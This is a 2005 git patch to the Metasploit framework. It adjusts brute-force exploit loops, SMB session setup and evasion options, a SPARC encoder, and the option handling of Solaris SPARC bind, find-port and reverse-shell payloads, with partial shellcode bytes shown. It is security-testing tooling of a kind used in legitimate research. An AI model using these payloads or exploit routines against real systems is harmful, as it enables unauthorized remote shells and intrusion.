From f468b10cff83e8bfb69aaa8a2305ddf5f11fcc88 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Sat, 31 Dec 2005 18:03:02 +0000
Subject: [PATCH] Tweaks

git-svn-id: file:///home/svn/incoming/trunk@3286 4d416f70-5f16-0410-b530-b9f4589650da
---
 lib/msf/core/exploit/brute.rb                              | 3 +++
 lib/msf/core/exploit/brutetargets.rb                       | 2 +-
 lib/msf/core/exploit/smb.rb                                | 7 +++++--
 lib/rex/proto/smb/client.rb                                | 6 ++++++
 modules/encoders/sparc/optyx.rb                            | 2 +-
 modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb   | 2 +-
 modules/payloads/singles/solaris/sparc/shell_find_port.rb  | 2 +-
 .../payloads/singles/solaris/sparc/shell_reverse_tcp.rb    | 4 ++--
 8 files changed, 20 insertions(+), 8 deletions(-)

diff --git a/lib/msf/core/exploit/brute.rb b/lib/msf/core/exploit/brute.rb
index 9c08044f0a..81587aeecb 100644
--- a/lib/msf/core/exploit/brute.rb
+++ b/lib/msf/core/exploit/brute.rb
@@ -87,6 +87,9 @@ module Exploit::Brute
 			# Keep going until we run out of options
 			while (curr.length != stopped.length)
 
+				# Stop brute forcing once a session is found
+				break if session_created?
+	
 				# Fire off an exploit attempt with the supplied addresses
 				brute_exploit(curr)
 
diff --git a/lib/msf/core/exploit/brutetargets.rb b/lib/msf/core/exploit/brutetargets.rb
index 148ea0cf64..08a63930b1 100644
--- a/lib/msf/core/exploit/brutetargets.rb
+++ b/lib/msf/core/exploit/brutetargets.rb
@@ -21,7 +21,7 @@ def exploit(*args)
 		
 		targets.each_index do |i|
 			next if i == 0
-			
+			break if session_created?
 			print_status("Trying target #{targets[i].name}...")
 			exploit_target(targets[i])
 		end
diff --git a/lib/msf/core/exploit/smb.rb b/lib/msf/core/exploit/smb.rb
index d6c882e243..93b247c9d5 100644
--- a/lib/msf/core/exploit/smb.rb
+++ b/lib/msf/core/exploit/smb.rb
@@ -30,7 +30,7 @@ module Exploit::Remote::SMB
 	
 		register_advanced_options(
 		[
-            OptBool.new('SMBPipeEvasion',     [ true, 'enable segmented read/writes for SMB Pipes', 'False']),
+			OptBool.new('SMBPipeEvasion',     [ true, 'Enable segmented read/writes for SMB Pipes', 'False']),
 			OptInt.new('SMBPipeWriteMinSize', [ true, 'Minimum buffer size for pipe writes',  1]),
 			OptInt.new('SMBPipeWriteMaxSize', [ true, 'Maximum buffer size for pipe writes', 1024]),
 			OptInt.new('SMBPipeReadMinSize',  [ true, 'Minimum buffer size for pipe reads',  1]),
@@ -51,7 +51,10 @@ module Exploit::Remote::SMB
 	end
 
     def connect()
-        super
+        
+		disconnect()
+		
+		super
     
 		self.simple = SIMPLE.new(self.sock, datastore['SMBDirect'])
 
diff --git a/lib/rex/proto/smb/client.rb b/lib/rex/proto/smb/client.rb
index ea40253772..526448ba2a 100644
--- a/lib/rex/proto/smb/client.rb
+++ b/lib/rex/proto/smb/client.rb
@@ -622,6 +622,12 @@ EVADE = Rex::Proto::SMB::Evasions
 		self.smb_send(pkt.to_s)
 		ack = self.smb_recv_parse(CONST::SMB_COM_SESSION_SETUP_ANDX, true)
 		
+		
+		# The server doesn't know about NTLM_NEGOTIATE, try ntlmv1
+		if (ack['Payload']['SMB'].v['ErrorClass'] == 0x00020002)
+			return session_setup_ntlmv1(user, pass, domain)
+		end
+		
 		# Make sure the error code tells us to continue processing
 		if (ack['Payload']['SMB'].v['ErrorClass'] != 0xc0000016)
 			failure = XCEPT::ErrorCode.new
diff --git a/modules/encoders/sparc/optyx.rb b/modules/encoders/sparc/optyx.rb
index ad22ae28fc..97baf29db6 100644
--- a/modules/encoders/sparc/optyx.rb
+++ b/modules/encoders/sparc/optyx.rb
@@ -4,7 +4,7 @@ module Msf
 module Encoders
 module Sparc
 
-class LongXor < Msf::Encoder::Xor
+class LongXor < Msf::Encoder::XorAdditiveFeedback
 
 	def initialize
 		super(
diff --git a/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb b/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb
index fd59e582b6..09ce91fd2c 100644
--- a/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb
+++ b/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb
@@ -25,7 +25,7 @@ module ShellBindTcp
 	end
 
 	def generate
-		port    = (datastore['RPORT'] || 0).to_i
+		port    = (datastore['RPORT'] || '0').to_i
 		payload = 
 			"\x9c\x2b\xa0\x07\x98\x10\x20\x01\x96\x1a\xc0\x0b\x94\x1a\xc0\x0b" +
 			"\x92\x10\x20\x02\x90\x10\x20\x02\x82\x10\x20\xe6\x91\xd0\x20\x08" +
diff --git a/modules/payloads/singles/solaris/sparc/shell_find_port.rb b/modules/payloads/singles/solaris/sparc/shell_find_port.rb
index 10c5b71c81..6714eaf40d 100644
--- a/modules/payloads/singles/solaris/sparc/shell_find_port.rb
+++ b/modules/payloads/singles/solaris/sparc/shell_find_port.rb
@@ -25,7 +25,7 @@ module ShellFindPort
 	end
 
 	def generate
-		port    = (datastore['CPORT'] || 0).to_i
+		port    = (datastore['CPORT'] || '0').to_i
 		payload = 
 			Rex::Arch::Sparc.set(port, "l0") +
 			"\x9c\x2b\xa0\x07\x90\x1a\x80\x0a\xd0\x23\xbf\xe8\x90\x02\x20\x01" +
diff --git a/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb b/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb
index 6ce2d12415..b9bfc28cf6 100644
--- a/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb
@@ -26,8 +26,8 @@ module ShellReverseTcp
 	end
 
 	def generate
-		port    = (datastore['RPORT'] || '0').to_i 
-		host    = Rex::Socket.resolv_nbo_i(datastore['RHOST'] || '127.0.0.1')
+		port    = (datastore['LPORT'] || '0').to_i 
+		host    = Rex::Socket.resolv_nbo_i(datastore['LHOST'] || '127.0.0.1')
 
 		payload =
 			"\x9c\x2b\xa0\x07\x98\x10\x20\x01\x96\x1a\xc0\x0b\x94\x1a\xc0\x0b" +